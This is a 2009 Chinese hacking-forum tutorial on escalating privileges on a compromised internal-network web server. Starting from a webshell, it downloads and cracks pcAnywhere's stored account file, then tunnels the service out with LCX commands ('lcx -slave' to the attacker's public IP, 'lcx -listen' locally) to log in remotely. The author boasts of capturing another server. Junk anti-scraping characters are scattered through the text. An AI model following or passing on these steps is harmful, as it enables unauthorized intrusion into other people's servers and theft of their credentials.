|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
, K2 a" i8 n* `# H1 \) h2 l
6 m0 @- `: j; |8 W9 x: s提权方法:pcanywhere+LCX
6 G# i$ X6 r& s' R9 `1 V1 p0 A; z1 E( Y4 }' ]& h/ b# J
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。$ A0 S4 j& x+ C/ T; m
* I6 o. Q& d! u! h. x. G
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
1 o# Q4 c& H: B/ g! I
7 {. X: r' ]; W4 r" F) k- P1 f6 }- ~4 A- Q9 u! F
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。. m- ]/ S& W4 j& u# v
3 `0 D3 P3 O# b, P
/ W/ e6 o! R7 U. H. w3 D呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。' p! a$ d, e% V2 m, d0 X& n% N. j
! T& [1 ]& W; O' O) E% S
3 W6 M) P7 }4 X1 ^ x3 Y, C
! U- @3 m4 Q9 N
6 \) L1 h- A+ ~. }由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
B' e5 ~" R, H9 B: \4 k3 a1 n
5 J) \# z: T& f5 a1 h$ ]' u/ B7 T1 K/ W3 V) F! N
LCX的用法再简单说下:
( z s2 k9 N1 d& x6 W8 e' O& p8 z" j1 ?& f& |
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)* i0 R2 L' J+ X( b
7 B+ n# s* B+ {
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
( q' A/ M. R7 x' a3 h6 U
# c8 d2 h# H" O7 p由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
& p$ I: S; J8 f( c/ q# v4 b顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
6 P. i: f" u& L( ~' t& M# m5 H& I3 o5 {1 W+ |( C
5 g: q/ x# D# @, T% K$ q' ^4 o1 \0 v2 W6 ]
. Z" ]. W. l3 `% S
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
) ^9 x6 Z5 e% l' ` Z
: L3 J* k4 Z. U( G; z3 C
4 {) I$ k+ t9 H; @
& S! s* q' o5 B4 a1 k" W: J
6 Q ^; }3 f) e. Z我们本地连接试试,输入我们刚破解的账号密码# n9 l" @, g) N2 }
9 e8 @4 ?; ^! U* Z, N! E6 z
$ @8 M9 }/ }+ ?$ m9 k呵呵``连接成功,服务器不错,又一个8核^︵^
1 U$ g) H& G& ?) G& K8 }
+ ^$ A: \; ~4 a. x k' ?' Q$ Q" i
. i9 n! S2 }; | |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
.gif)
